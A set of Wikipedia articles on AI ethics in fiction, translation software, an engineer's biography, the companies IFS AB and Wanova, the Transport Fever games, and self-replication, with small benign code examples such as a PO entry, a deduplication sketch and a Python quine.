The movie The Thirteenth Floor suggests a future where simulated worlds with sentient inhabitants are created by computer game consoles for the purpose of entertainment. The movie The Matrix suggests a future where the dominant species on planet Earth are sentient machines and humanity is treated with utmost speciesism. The short story "The Planck Dive" suggests a future where humanity has turned itself into software that can be duplicated and optimized, and the relevant distinction between types of software is between sentient and non-sentient. The same idea can be found in the Emergency Medical Hologram of the starship Voyager, an apparently sentient copy of a reduced subset of the consciousness of its creator, Dr. Zimmerman, who, for the best motives, created the system to give medical assistance in case of emergencies. The movies Bicentennial Man and A.I. deal with the possibility of sentient robots that could love. I, Robot explored some aspects of Asimov's Three Laws. All these scenarios try to foresee possibly unethical consequences of the creation of sentient computers. The ethics of artificial intelligence is one of several core themes in BioWare's Mass Effect series of games. It explores the scenario of a civilization accidentally creating AI through a rapid increase in computational power via a global-scale neural network. This event caused an ethical schism between those who felt that bestowing organic rights upon the newly sentient Geth was appropriate and those who continued to see them as disposable machinery and fought to destroy them. Beyond the initial conflict, the complexity of the relationship between the machines and their creators is another ongoing theme throughout the story. Detroit: Become Human is one of the most famous recent video games to discuss the ethics of artificial intelligence.
Quantic Dream designed the game's chapters around interactive storylines in an innovative way, giving players a more immersive gaming experience. Players control three different awakened androids who, in the face of different events, make different choices aimed at changing how humans view the android group; different choices result in different endings. This is one of the few games that puts players in the androids' perspective, which allows them to better consider the rights and interests of robots once a true artificial intelligence is created. Over time, debates have tended to focus less and less on possibility and more on desirability, as emphasized in the "Cosmist" and "Terran" debates initiated by Hugo de Garis and Kevin Warwick. A Cosmist, according to Hugo de Garis, actually seeks to build more intelligent successors to the human species. Experts at the University of Cambridge have argued that AI is portrayed in fiction and nonfiction overwhelmingly as racially White, in ways that distort perceptions of its risks and benefits.
See also
Notes
External links
Ethics of Artificial Intelligence at the Internet Encyclopedia of Philosophy
Ethics of Artificial Intelligence and Robotics at the Stanford Encyclopedia of Philosophy
BBC News: Games to take on a life of their own
Who's Afraid of Robots?, an article on humanity's fear of artificial intelligence
A short history of computer ethics
AI Ethics Guidelines Global Inventory by Algorithmwatch
Philosophy of artificial intelligence
Ethics of science and technology
56083022
https://en.wikipedia.org/wiki/List%20of%20translation%20software
List of translation software
This is a list of notable translation software.
Software
Recommended PO file editors/translators (in no particular order):
XEmacs (with po-mode): runs on Unices with X
GNU Emacs (with po-mode): runs on Unices and Windows
poEdit: Linux, Mac OS X, and Windows; poEdit has supported multiple plural forms since version 1.3.
OmegaT is another translation tool that can translate PO files. It is written in Java, so it is available for multiple platforms (including Linux and Windows). It can be downloaded from SourceForge.
GNU Gettext (Linux/Unix), used for the GNU Translation Project. Gettext also provides msgmerge, which makes merging translations easy (a minimal PO example appears at the end of this article).
Vim (Linux/Unix and Windows versions available) with the PO ftplugin for easier editing of GNU gettext PO files.
gtranslator for Linux
Virtaal: Linux and Windows; a beta release is available for Mac OS X 10.5 and newer. Native support for Gettext PO translation as well as XLIFF and other formats. Simple interface with powerful machine translation, translation memory and terminology management features.
GlobalSight
Other tools
Google Translator Toolkit
References
Material was copied from this source, which is available under a Creative Commons Attribution-ShareAlike 2.0 Generic (CC BY-SA 2.0) license.
See also
Computer-assisted translation
Comparison of computer-assisted translation tools
Machine translation
Translation memory
Lists of software
Software
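To make the Gettext and msgmerge entries in the list above concrete, the snippet below shows a minimal PO entry using plural forms, of the kind the editors listed above operate on. The source-reference comment, the German strings and the file names are illustrative assumptions only.

```
# Header excerpt (part of the header entry's msgstr in de.po):
#   "Plural-Forms: nplurals=2; plural=(n != 1);\n"

#: src/copy.c:42
msgid "%d file copied"
msgid_plural "%d files copied"
msgstr[0] "%d Datei kopiert"
msgstr[1] "%d Dateien kopiert"
```

An existing translation is typically refreshed against an updated template with an invocation such as msgmerge --update de.po messages.pot, after which fuzzy or missing entries can be completed in any of the editors above.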
65403428
https://en.wikipedia.org/wiki/William%20Stuart%20Michelson
William Stuart Michelson
William Stuart Michelson (born 1987) is an American engineer and member of the research faculty at the Georgia Tech Research Institute. Michelson is known as a subject matter expert in Human Systems Engineering. He leads Human Factors and Ergonomics and Human Systems Integration (HSI) efforts for DoD customers, specializing in tactical display design spanning command and control, training, unmanned vehicle ground control stations, manned-unmanned teaming, and mission planning. He has expertise in digital human modeling, ergonomic and anthropometric analyses to assess cockpit accommodation, and experience with wearable soldier systems and tactical equipment design. Since 2000, Michelson has organized the American venue and the annual Symposium on Dynamic Flight Behavior for Aerial Robotics for the International Aerial Robotics Competition (IARC). The IARC, which seeks to advance the state of the art in fully autonomous aerial robotics, was created by his father, Robert C. Michelson, in 1991 and has two venues: the American Venue and the Asia/Pacific Venue. Michelson is a Lifetime Charter member of Trail Life USA, and currently serves as the Vice Chairman of the National Board of Directors for the organization. He was involved in the launch of the Trail Life USA program in September 2013. Before joining the Board of Directors, Michelson served as the State Leadership Chairman for Georgia, and served as the coordinator for the Atlanta venue of the 2014 Trail Leader Training Conference. He pioneered an adult training model and oversaw its deployment as the chairman of an inaugural adult leader training event at the Trail Life USA headquarters located at Camp Aiken in South Carolina. As a certified firearms instructor, he led a diverse national team of volunteers to develop the Trail Life USA shooting sports program. As a youth, Michelson came up through the Boy Scouts of America, earning his Eagle Scout rank with 6 Palms and being bestowed the Vigil Honor in the Order of the Arrow. As an adult, and prior to leaving the Boy Scouts of America, Michelson provided a monthly training program for adult volunteers and wrote custom training programs for youth that were adopted nationwide. He led several international Scouting initiatives, as well as organizing and planning Scouting events attended by thousands on a national scale. Other past volunteer roles within the organization included Scoutmaster, Varsity Coach, District Member at Large, Commissioner, and National Order of the Arrow staff. From 2013 to 2014, Michelson served in an advisory capacity to the board of Reformation Hope in matters dealing with youth programs. He led efforts to foster new opportunities to help youth programs flourish in the country of Haiti and to meet orphaned children's needs, including an exchange program and a clothing acquisition fund. His most recent visit to the country was in 2016. In 2020, Michelson became a volunteer with the Evangelical Council for Abuse Prevention (ECAP), working on projects aimed at protecting children and other vulnerable populations from abuse.
Biography
Early life
Michelson was born in 1987 in Atlanta, Georgia, the second son of Robert and Denise Michelson, and is related to Christian Michelsen, the first Prime Minister of Norway. As a youth, Michelson was involved in outdoor activities, especially those involving camping and outdoor skills. To this day, he remains a student of outdoor activities such as sailing, primitive survival skills, archery, and firearms proficiency.
Education
Michelson attended Cherokee Christian School during first through eighth grades. He attended Dominion Christian High School prior to enrolling at the Georgia Institute of Technology, where he attained scientific degrees in Science, Technology, and Culture, as well as Human Computer Interaction (with honors).
Career
Michelson has held Associate Human Factors Professional status from the Board of Certification in Professional Ergonomics, is recognized as a graphic design professional by the International Academy of Computer Training, is certified to conduct ethical Human Subjects Research by the Collaborative Institutional Training Initiative, and presently serves the Georgia Tech Research Institute as Senior Research Scientist. He has published over 50 journal papers, book chapters and reports. In 2018 he became the Associate Head of the Georgia Tech Research Institute's Human Systems Engineering Branch of the GTRI Electronic Systems Laboratory.
Professional activities
Michelson is a full Member of the Human Factors and Ergonomics Society, a Life member of the National Defense Industrial Association, and a member of the Association for Unmanned Vehicle Systems International. He serves as a Competition Director on behalf of RoboNation (formerly known as the AUVSI Foundation). As a member of the Georgia Tech faculty, Michelson has taught several courses, including modules in PMASE 6131 (Georgia Tech Professional Education, 2017–2018, Applied Systems Engineering): Human Factors Engineering, Training, Survivability, Habitability, User Centered Design, and Test & Evaluation. Michelson has also served as an instructor for the Georgia Tech Professional Education short courses Introduction to Human Systems Integration and Fundamentals of Modern Systems Engineering. He is also organizer of the American Venue of the annual International Aerial Robotics Competition and the annual Symposium on Dynamic Flight Behavior for Aerial Robotics.
Professional programmatic interests
In 2007 Michelson began work at the Georgia Tech Research Institute. Michelson has supported and led numerous notable programs within the Georgia Tech Research Institute, leveraging his knowledge of soldier loadout and autonomous unmanned systems. Notably, he has designed graphical user interfaces, developed human-centered system requirements, led programs to quantify human performance, assessed anthropometric accommodations, and supported system test and evaluation for DoD stakeholders spanning the United States Navy, Air Force, Army, and Marine Corps. A frequent speaker across the Georgia Institute of Technology, international conferences, and government entities such as DARPA, Michelson is known for developing novel concepts for the command and control of unmanned systems, utilizing Model Based Systems Engineering to express man-machine teaming relationships, graphical user interface design for DoD systems, military mission planning concepts, and basic research on touch zone sizes for military touchscreens in moving environments. Michelson has supported and organized a number of military working groups spanning topics such as electronic warfare, unmanned systems, and military end user engagement. Within the Human Factors Engineering context, Michelson is an advocate for "Mission-Driven Robotics".
Professional honors and awards
Michelson received the Deputy Director's Certificate for Service from the U.S. Army Soldier Battle Lab at Fort Benning.
He is also the recipient of the University System of Georgia Award for Exceptional Composition and the Georgia Secretary of State's Commendation for Outstanding Citizenship.
Avocations
Michelson is certified in various fields including amateur radio (Technician Class Operator's License, station KG4ZIR) and scuba diving. He has been a PADI certified SCUBA diver since 2000, and has been a recreational diver in the Caribbean Sea and Atlantic Ocean. He became a certified firearms instructor in 2012. He is fluent in English, and has proficiency in German.
Presence in popular media and literature
Michelson has often been quoted in news programming with regard to the International Aerial Robotics Competition and the applications of the underlying technology to military and civilian spheres, as well as with regard to Trail Life USA on radio and television. Michelson's work on the command and control of heterogeneous unmanned systems was featured by Drone360 Magazine in 2016, and he has been referenced in Backpacker Magazine. Michelson was also featured in a commercial produced by General Dynamics Mission Systems promoting advancement of the next generation of autonomous systems through collegiate student competition, and has been featured repeatedly in promotional materials produced by the Association for Unmanned Vehicle Systems International.
Representative select publications
"Concepts for Manned Unmanned Teaming Behaviors in Model Based Systems Engineering", National Defense Industrial Association Ground Vehicle Systems Engineering and Technology Symposium, 2019
"Human Centered Teaming of Autonomous Battlefield Robotics", National Defense Industrial Association Ground Vehicle Systems Engineering and Technology Symposium, 2018
"A Survey of the Human-Centered Approach to Micro Air Vehicles", Chapter 90, Springer Handbook of Unmanned Aerial Vehicles, Springer-Verlag Publishing Company, 2014
"Human Centered Alerting Strategies Supporting Cross Platform Teams of Unmanned Vehicles", AUVSI Xponential Unmanned Systems Conference, 2019
"A Model of Human Machine Interaction for Mission-Driven Robotics", AUVSI Xponential Unmanned Systems Conference, 2020
See also
Georgia Tech Research Institute
International Aerial Robotics Competition
Trail Life USA
References
External links
Georgia Tech Research Institute
Trail Life USA
Board Member of Trail Life USA
Reformation Hope
Evangelical Council for Abuse Prevention
Living people
1987 births
21st-century American scientists
American people of Norwegian descent
Engineering educators
Georgia Tech faculty
Georgia Tech alumni
Georgia Tech Research Institute people
Amateur radio people
People from Atlanta
29459946
https://en.wikipedia.org/wiki/IFS%20AB
IFS AB
IFS AB (Industrial and Financial Systems) is a multinational enterprise software company headquartered in Linköping, Sweden. The company develops and delivers enterprise software for customers around the world who manufacture and distribute goods, maintain assets, and manage service-focused operations. IFS has over 4,000 employees that support more than 10,000 customers worldwide from a network of local offices and a growing ecosystem of partners.
History
Early years (1983–1996)
IFS was founded in 1983 in Sweden and launched its first software product, IFS Maintenance, in 1985. Five years later the complete product suite, known as IFS Applications, was launched. The next several years saw IFS expand its presence in the Scandinavian region with the establishment of offices in Norway, Finland and Denmark, and then expand outside Scandinavia into Poland. In 1993, IFS introduced its first graphical user interface and expanded to Malaysia. In 1995, it expanded to North America.
Expansions (1996–2015)
In 1996, IFS was listed on the Swedish stock exchange and the product was made component-based. This was followed by the launch of its web client and the establishment of an R&D center in Colombo. In 2001, IFS introduced mobile clients and Java-based internet portals. In 2004, NEC acquired 7.7% of IFS's share capital. By 2005, IFS Applications had more than 500,000 users. In 2008, IFS launched its new GUI and began a series of acquisitions.
Investment by EQT (2015– )
In 2015, IFS had reached more than one million global users and was acquired by EQT, a Swedish private equity group. IFS released its most recent ERP system, IFS Applications 10, in 2018 – the same year that Darren Roos was appointed as CEO – followed by IFS Field Service Management 6 in 2019. In September 2020, private equity firm TA Associates bought into IFS with a significant minority stake.
Operations
IFS is governed by the company's Executive Management Team, providing leadership and direction from a global, operational perspective. Strategically, the company has a four-region focus, led by members of the Executive Management Team. These focus areas are: Southern & Western Europe, Northern & Central Europe, Americas, and APJME&A.
Acquisitions
Philanthropy
In 2015, IFS initiated the IFS Education Programme, focusing on inspiring more students to study beyond elementary school and highlighting the importance of STEM subjects. Partnerships with schools were based around lectures and teaching by IFS staff, donation of computer equipment, financial support through scholarships and grants, and free IFS software. In 2018, over 90 universities were part of the IFS Education Programme. IFS offers its employees one CSR day per year to use to volunteer in their local communities. In 2019, IFS employees volunteered 4,624 hours of their time. IFS has been present in Sri Lanka for over 20 years, and the IFS Foundation was created by IFS employees to give back to rural villages in Sri Lanka by improving living conditions. The trustees of the IFS Foundation have indicated that they plan to address healthcare, sanitation, education, access to clean water, and rural poverty. Key projects in 2019 focused on the provision of sanitation facilities, tube wells, and improvements to the local school.
Accolades
In the recent past IFS has gained several accolades in multiple categories across business, technology, HR and culture.
IFS was selected as the winner of the European Digital Technology Award, out of 150,000 businesses from over 33 countries, at the European Business Awards 2019. In 2020, its CEO Darren Roos was named 'CEO of the Year 2020', and IFS won bronze in the Transform Awards 2020. IFS received a 5-Star rating from CRN®, a brand of The Channel Company, in its 2020 Partner Program Guide. The company has received several Great Place to Work recognitions (2018, 2017, 2016), as well as praise for multiple CSR initiatives, including the CSR Excellence Award for the IFS Education Programme alongside the CSR Award, both in 2019.
See also
List of ERP software packages
Notes
References
Swedish brands
ERP software companies
CRM software companies
Companies established in 1983
Software companies of Sweden
Software companies of Sri Lanka
55480194
https://en.wikipedia.org/wiki/Transport%20Fever
Transport Fever
Transport Fever is a business video game series developed by Urban Games and published by Gambitious Digital Entertainment. The franchise was introduced in 2014 with the first game, Train Fever; the latest game, Transport Fever 2, was released in 2019.
Games
Train Fever (2014)
The first video game of the series was initially released on 4 September 2014 for Microsoft Windows, macOS, and Linux.
Transport Fever (2016)
A sequel, titled Transport Fever, was announced in April 2016. It became available worldwide for Microsoft Windows on 8 November 2016.
Transport Fever 2 (2019)
Transport Fever 2 was initially available for Microsoft Windows and Linux via Steam on 11 December 2019. Urban Games remained the developer, while Good Shepherd Entertainment, which had rebranded from Gambitious Digital Entertainment, published the game. A macOS version was released in autumn 2020.
References
External links
Business simulation games
Linux games
Transport simulation games
Video game franchises introduced in 2014
28322865
https://en.wikipedia.org/wiki/Wanova
Wanova
Wanova, Inc, headquartered in San Jose, California, provides software to help IT organizations manage, support and protect data on desktop and laptop computers. Wanova's primary product, Wanova Mirage, was designed as an alternative to server-hosted desktop virtualization technologies. History Wanova was founded in January 2008 by Ilan Kessler and Issy Ben-Shaul, previously co-founders of Actona Technologies, which was acquired by Cisco in 2004 and became the foundation for Cisco Wide Area Application Services (WAAS). The company received its first round of funding from Greylock Partners, Carmel Ventures and Opus Capital in the sum of $13 million. As of May 22, 2012 Issy Ben-Shaul announced on Wanova Blog that Wanova has become a part of VMware. Products As of February 2011, there is one primary product, Wanova Mirage hybrid desktop virtualization software, which has three components: Wanova Mirage Client, Wanova Mirage Server, and Wanova Network Optimization. The Mirage Client is a small MSI that installs on the PC of an end user, and allows the endpoint to become managed by the Mirage Server. The Mirage Server provides tools for creating, managing and deploying a Base Image, which typically consists of an Operating System (OS) and core applications that an administrator wants to manage centrally, such as Microsoft Office or Antivirus. Mirage Server also manages the backup and restore synchronization process. Distributed Desktop Optimization incorporates capabilities such as deduplication and compression that make the product effective over a low bandwidth, high-latency WAN. Once Mirage is installed, IT administrators maintain a complete, bootable desktop instance in the data center. This instance is hardware agnostic, and can be instantiated on both physical hardware or in a virtual machine. No hypervisor is required when the instance is deployed into PC hardware. How VMware Mirage Works Mirage logically splits the PC into individual layers that can be independently managed: a Base Image; a layer including user-installed applications and machine information, such as machine ID; and a layer including user data, files and personalization. In this manner, IT can create a single read-only Base Image, typically including an operating system (OS) and the core applications they will manage centrally, such as Microsoft Office and an antivirus solution. This Base Image can be deployed to the locally stored copy of each PC, and then synchronized as a whole with the endpoint. Because of the layering, the Image can be patched, updated, and re-synchronized as needed, without overwriting the user-installed applications or data. These features, combined with the network optimizations, create a number of use cases: Single Image Management – IT can manage one primary image and synchronize it with thousands of endpoints Hardware Migration – By replacing the Base Image associated with an end user's PC, the user's desktop, including applications, data, and personalization settings, can be migrated to new hardware, including hardware from a different manufacturer. This process can be used as part of a regular hardware migration process, or to quickly replace a lost, stolen or broken PC. Remote repair of a damaged application – By ‘Enforcing’ a Base Image, IT can ensure a remote device exactly matches the primary copy in the data center, and repairing OS or core application problems. 
In-place migration from Windows XP to Windows 7 – By replacing the Base Image associated with an end user's PC, the user's desktop, including data and personalization settings, can be migrated from Windows XP to Windows 7, over the network and without added infrastructure.
Differences between VMware Mirage and Virtual Desktop Infrastructure (VDI)
Virtual Desktop Infrastructure, or VDI, was initially branded by VMware. The term VDI has enjoyed broader usage, however, and has come to be known as a synonym for server-hosted desktop virtualization, or Hosted Virtual Desktops (Gartner). A typical VDI architecture replaces end users' desktops by deploying each desktop on a virtual machine running on a server in the data center. Users access a view of their desktop via a thin client or other access device, using a vendor-specific protocol. VMware Mirage differs fundamentally from this type of architecture in the following ways:
No hypervisor required: While Mirage can operate within a Type-1 or Type-2 hypervisor, one is not required. The VMware Mirage client operates as a service within the Windows operating system (OS).
Scalability: Because VDI uses centralized servers to handle all processing functions for each desktop, a typical server can support roughly 10–12 users, depending on load. Mirage uses the endpoints for processing, and can consequently scale to a 1500:1 desktop-to-server ratio.
Deployment: In most environments, Mirage deployment leverages components an organization already has in place: endpoint PCs, a server, and back-end storage. End users do not change their workflow.
Network optimizations: Mirage leverages a single global index that enables significant deduplication across all users, reducing network traffic and storage requirements (a generic sketch of this kind of chunk-level deduplication appears at the end of this article).
Storage: Because VDI users require synchronous network access to their centralized desktop, performance can be significantly impacted by the type of back-end storage. Because Mirage clients run a local instance of the centrally stored desktop, storage is only accessed when synchronization is required; secondary storage, including lower-cost SATA drives, is adequate.
Known limitations
The software is currently compatible only with the Windows OS. There is no native offering for other operating systems such as Linux or Mac OS X. The software may still be used inside virtual machines running a supported Windows OS on such platforms.
See also
Desktop virtualization
Virtual Desktop Infrastructure
References
External links
Wanova is Part of VMware. Wanova Blog. May 22, 2012
Wanova Mirage 2.0 managing physical, virtual and cloud Windows desktops. ZDNet. February 3, 2011
Wanova Makes Mirage Virtual Desktop Solution Enterprise-Ready. eWeek. January 25, 2011
TechTarget's SearchServerVirtualization.com Announces "Best of VMworld" 2010 Award Winners. BusinessWire. September 2, 2010
Wanova Redefines Windows Desktop Management and Provisioning. eWeek. August 18, 2010
Desktop Virtualization Aids Windows 7 Migration. ITBusinessEdge. September 1, 2010
Products of the Week. NetworkWorld. May 17, 2010
Startup Wanova Launches Distributed Desktop Virtualization. The VAR Guy. March 16, 2010
Wanova Releases Mirage Desktop Virtualization Software. eWeek. March 16, 2010
Four Reasons Why VDI Might Not Be For You. Search Virtual Desktop.
July 8, 2010
Wanova Home Page
Software companies based in the San Francisco Bay Area
Virtualization software
Software companies established in 2008
Companies based in San Jose, California
Software companies of Israel
Software companies of the United States
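The single global index deduplication described under Network optimizations above can be illustrated with a short, generic sketch. This is not Wanova's or VMware's actual implementation; the chunk size, function names and hashing scheme are illustrative assumptions only. The idea is that desktop images are split into chunks, each chunk is identified by a cryptographic hash, and a chunk is stored (or transferred over the WAN) only if its hash is not already present in the shared index.

```python
import hashlib

CHUNK_SIZE = 64 * 1024  # illustrative fixed-size 64 KiB chunks

def chunk_hashes(image: bytes):
    """Split an image into fixed-size chunks, yielding (hash, chunk) pairs."""
    for offset in range(0, len(image), CHUNK_SIZE):
        chunk = image[offset:offset + CHUNK_SIZE]
        yield hashlib.sha256(chunk).hexdigest(), chunk

def sync_to_server(image: bytes, server_index: dict) -> list:
    """Store only chunks the shared index has not seen; return the image 'recipe'."""
    recipe = []  # ordered chunk hashes that fully describe this desktop image
    for digest, chunk in chunk_hashes(image):
        if digest not in server_index:   # new chunk: would be transferred over the WAN
            server_index[digest] = chunk
        recipe.append(digest)            # duplicate chunks cost only a reference
    return recipe

# Two desktops sharing most of their content deduplicate against one index.
index = {}
recipe_a = sync_to_server(b"common OS image" * 10000 + b"files of user A", index)
recipe_b = sync_to_server(b"common OS image" * 10000 + b"files of user B", index)
print(len(recipe_a) + len(recipe_b), "chunk references,", len(index), "unique chunks stored")
```

Under this scheme the second desktop adds only the chunks that differ from the first, which is the effect the article attributes to Mirage's cross-user deduplication.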
29549
https://en.wikipedia.org/wiki/Self-replication
Self-replication
Self-replication is any behavior of a dynamical system that yields construction of an identical or similar copy of itself. Biological cells, given suitable environments, reproduce by cell division. During cell division, DNA is replicated and can be transmitted to offspring during reproduction. Biological viruses can replicate, but only by commandeering the reproductive machinery of cells through a process of infection. Harmful prion proteins can replicate by converting normal proteins into rogue forms. Computer viruses reproduce using the hardware and software already present on computers. Self-replication in robotics has been an area of research and a subject of interest in science fiction. Any self-replicating mechanism which does not make a perfect copy (mutation) will experience genetic variation and will create variants of itself. These variants will be subject to natural selection, since some will be better at surviving in their current environment than others and will out-breed them. Overview Theory Early research by John von Neumann established that replicators have several parts: A coded representation of the replicator A mechanism to copy the coded representation A mechanism for effecting construction within the host environment of the replicator Exceptions to this pattern may be possible, although none have yet been achieved. For example, scientists have come close to constructing RNA that can be copied in an "environment" that is a solution of RNA monomers and transcriptase. In this case, the body is the genome, and the specialized copy mechanisms are external. The requirement for an outside copy mechanism has not yet been overcome, and such systems are more accurately characterized as "assisted replication" than "self-replication". Nonetheless, in March 2021, researchers reported evidence suggesting that a preliminary form of transfer RNA could have been a replicator molecule itself in the very early development of life, or abiogenesis. However, the simplest possible case is that only a genome exists. Without some specification of the self-reproducing steps, a genome-only system is probably better characterized as something like a crystal. Classes of self-replication Recent research has begun to categorize replicators, often based on the amount of support they require. Natural replicators have all or most of their design from nonhuman sources. Such systems include natural life forms. Autotrophic replicators can reproduce themselves "in the wild". They mine their own materials. It is conjectured that non-biological autotrophic replicators could be designed by humans, and could easily accept specifications for human products. Self-reproductive systems are conjectured systems which would produce copies of themselves from industrial feedstocks such as metal bar and wire. Self-assembling systems assemble copies of themselves from finished, delivered parts. Simple examples of such systems have been demonstrated at the macro scale. The design space for machine replicators is very broad. A comprehensive study to date by Robert Freitas and Ralph Merkle has identified 137 design dimensions grouped into a dozen separate categories, including: (1) Replication Control, (2) Replication Information, (3) Replication Substrate, (4) Replicator Structure, (5) Passive Parts, (6) Active Subunits, (7) Replicator Energetics, (8) Replicator Kinematics, (9) Replication Process, (10) Replicator Performance, (11) Product Structure, and (12) Evolvability. 
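Von Neumann's three-part scheme described above (a coded representation, a copy mechanism, and a construction mechanism) can be illustrated with a deliberately simple sketch. The class below is a toy model only — the names and the string "genome" are illustrative assumptions, not a model of any real replicator — but it shows how copying the description and building from the description are separate steps, and how imperfect copying introduces the variation mentioned earlier.

```python
import random

class Replicator:
    """Toy von Neumann-style replicator: tape (genome) + copier + constructor."""

    def __init__(self, genome: str):
        self.genome = genome  # the coded representation of the machine

    def copy_genome(self, mutation_rate: float = 0.0) -> str:
        """Copy mechanism: duplicate the tape, occasionally making copying errors."""
        alphabet = "ab"
        return "".join(
            random.choice(alphabet) if random.random() < mutation_rate else symbol
            for symbol in self.genome
        )

    def construct(self, tape: str) -> "Replicator":
        """Construction mechanism: build a new machine described by the tape."""
        return Replicator(tape)

    def reproduce(self, mutation_rate: float = 0.0) -> "Replicator":
        """Full cycle: copy the description, then construct from the copy."""
        return self.construct(self.copy_genome(mutation_rate))

parent = Replicator("abbaabba")
child = parent.reproduce(mutation_rate=0.05)  # imperfect copies create variants
print(parent.genome, "->", child.genome)
```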
A self-replicating computer program
In computer science a quine is a self-reproducing computer program that, when executed, outputs its own code. For example, a quine can be written in the Python programming language (a minimal example is given after the Applications paragraph below). A more trivial approach is to write a program that will make a copy of any stream of data that it is directed to, and then direct it at itself. In this case the program is treated both as executable code and as data to be manipulated. This approach is common in most self-replicating systems, including biological life, and is simpler as it does not require the program to contain a complete description of itself. In many programming languages an empty program is legal, and executes without producing errors or other output. The output is thus the same as the source code, so the program is trivially self-reproducing.
Self-replicating tiling
In geometry a self-replicating tiling is a tiling pattern in which several congruent tiles may be joined together to form a larger tile that is similar to the original. This is an aspect of the field of study known as tessellation. The "sphinx" hexiamond is the only known self-replicating pentagon. For example, four such concave pentagons can be joined together to make one with twice the dimensions. Solomon W. Golomb coined the term rep-tiles for self-replicating tilings. In 2012, Lee Sallows identified rep-tiles as a special instance of a self-tiling tile set, or setiset. A setiset of order n is a set of n shapes that can be assembled in n different ways so as to form larger replicas of themselves. Setisets in which every shape is distinct are called 'perfect'. A rep-n rep-tile is just a setiset composed of n identical pieces.
Self-replicating clay crystals
One form of natural self-replication that isn't based on DNA or RNA occurs in clay crystals. Clay consists of a large number of small crystals, and clay is an environment that promotes crystal growth. Crystals consist of a regular lattice of atoms and are able to grow if, for example, placed in a water solution containing the crystal components, automatically arranging atoms at the crystal boundary into the crystalline form. Crystals may have irregularities where the regular atomic structure is broken, and when crystals grow, these irregularities may propagate, creating a form of self-replication of crystal irregularities. Because these irregularities may affect the probability of a crystal breaking apart to form new crystals, crystals with such irregularities could even be considered to undergo evolutionary development.
Applications
It is a long-term goal of some engineering sciences to achieve a clanking replicator, a material device that can self-replicate. The usual reason is to achieve a low cost per item while retaining the utility of a manufactured good. Many authorities say that in the limit, the cost of self-replicating items should approach the cost-per-weight of wood or other biological substances, because self-replication avoids the costs of labor, capital and distribution in conventional manufactured goods. A fully novel artificial replicator is a reasonable near-term goal. A NASA study recently placed the complexity of a clanking replicator at approximately that of Intel's Pentium 4 CPU. That is, the technology is achievable with a relatively small engineering group in a reasonable commercial time-scale at a reasonable cost.
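The Python quine referred to at the start of this section can be written, in one common two-line form, as follows. Comments are deliberately omitted from the program itself, since a quine must reproduce its source exactly:

```python
s = 's = %r\nprint(s %% s)'
print(s % s)
```

When run, the %r conversion substitutes the string's own repr back into itself, so the printed output is character-for-character identical to the source.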
Given the currently keen interest in biotechnology and the high levels of funding in that field, attempts to exploit the replicative ability of existing cells are timely, and may easily lead to significant insights and advances. A variation of self-replication is of practical relevance in compiler construction, where a similar bootstrapping problem occurs as in natural self-replication. A compiler (phenotype) can be applied to the compiler's own source code (genotype), producing the compiler itself. During compiler development, a modified (mutated) source is used to create the next generation of the compiler. This process differs from natural self-replication in that the process is directed by an engineer, not by the subject itself.
Mechanical self-replication
An active area of research in robotics is the self-replication of machines. Since all robots (at least in modern times) have a fair number of the same features, a self-replicating robot (or possibly a hive of robots) would need to do the following:
Obtain construction materials
Manufacture new parts, including its smallest parts and thinking apparatus
Provide a consistent power source
Program the new members
Error-correct any mistakes in the offspring
On a nano scale, assemblers might also be designed to self-replicate under their own power. This, in turn, has given rise to the "grey goo" version of Armageddon, as featured in the science fiction novels Bloom and Prey. The Foresight Institute has published guidelines for researchers in mechanical self-replication. The guidelines recommend that researchers use several specific techniques for preventing mechanical replicators from getting out of control, such as using a broadcast architecture. For a detailed article on mechanical reproduction as it relates to the industrial age see mass production.
Fields
Research has occurred in the following areas:
Biology: studies of organismal and cellular natural replication and replicators, and their interaction, including sub-disciplines such as population dynamics, quorum sensing and autophagy pathways. These can be an important guide to avoiding design difficulties in self-replicating machinery.
Chemistry: self-replication studies are typically about how a specific set of molecules can act together to replicate each other within the set (often part of the systems chemistry field).
Biochemistry: simple systems of in vitro ribosomal self-replication have been attempted, but as of January 2021, indefinite in vitro ribosomal self-replication has not been achieved in the lab.
Nanotechnology, or more precisely molecular nanotechnology, is concerned with making nanoscale assemblers. Without self-replication, capital and assembly costs of molecular machines become impossibly large. Many bottom-up approaches to nanotechnology take advantage of biochemical or chemical self-assembly.
Space resources: NASA has sponsored a number of design studies to develop self-replicating mechanisms to mine space resources. Most of these designs include computer-controlled machinery that copies itself.
Memetics: the idea of a meme was coined by Richard Dawkins in his 1976 book The Selfish Gene, where he proposed a cognitive equivalent of the gene: a unit of behavior which is copied from one host mind to another through observation. Memes can only propagate via animal behavior and are thus analogous to information viruses, and are often described as viral.
Computer security: many computer security problems are caused by self-reproducing computer programs that infect computers — computer worms and computer viruses.
Parallel computing: loading a new program on every node of a large computer cluster or distributed computing system is time-consuming. Using mobile agents to self-replicate code from node to node can save the system administrator a lot of time. Mobile agents have the potential to crash a computer cluster if poorly implemented.
In industry
Space exploration and manufacturing
The goal of self-replication in space systems is to exploit large amounts of matter with a low launch mass. For example, an autotrophic self-replicating machine could cover a moon or planet with solar cells, and beam the power to the Earth using microwaves. Once in place, the same machinery that built itself could also produce raw materials or manufactured objects, including transportation systems to ship the products. Another model of self-replicating machine would copy itself through the galaxy and universe, sending information back. In general, since these systems are autotrophic, they are the most difficult and complex known replicators. They are also thought to be the most hazardous, because they do not require any inputs from human beings in order to reproduce. A classic theoretical study of replicators in space is the 1980 NASA study of autotrophic clanking replicators, edited by Robert Freitas. Much of the design study was concerned with a simple, flexible chemical system for processing lunar regolith, and with the differences between the ratio of elements needed by the replicator and the ratios available in regolith. The limiting element was chlorine, an essential element for processing regolith to obtain aluminium. Chlorine is very rare in lunar regolith, and a substantially faster rate of reproduction could be assured by importing modest amounts. The reference design specified small computer-controlled electric carts running on rails. Each cart could have a simple hand or a small bull-dozer shovel, forming a basic robot. Power would be provided by a "canopy" of solar cells supported on pillars. The other machinery could run under the canopy. A "casting robot" would use a robotic arm with a few sculpting tools to make plaster molds. Plaster molds are easy to make, and make precise parts with good surface finishes. The robot would then cast most of the parts either from non-conductive molten rock (basalt) or purified metals. An electric oven melted the materials. A speculative, more complex "chip factory" was specified to produce the computer and electronic systems, but the designers also said that it might prove practical to ship the chips from Earth as if they were "vitamins".
Molecular manufacturing
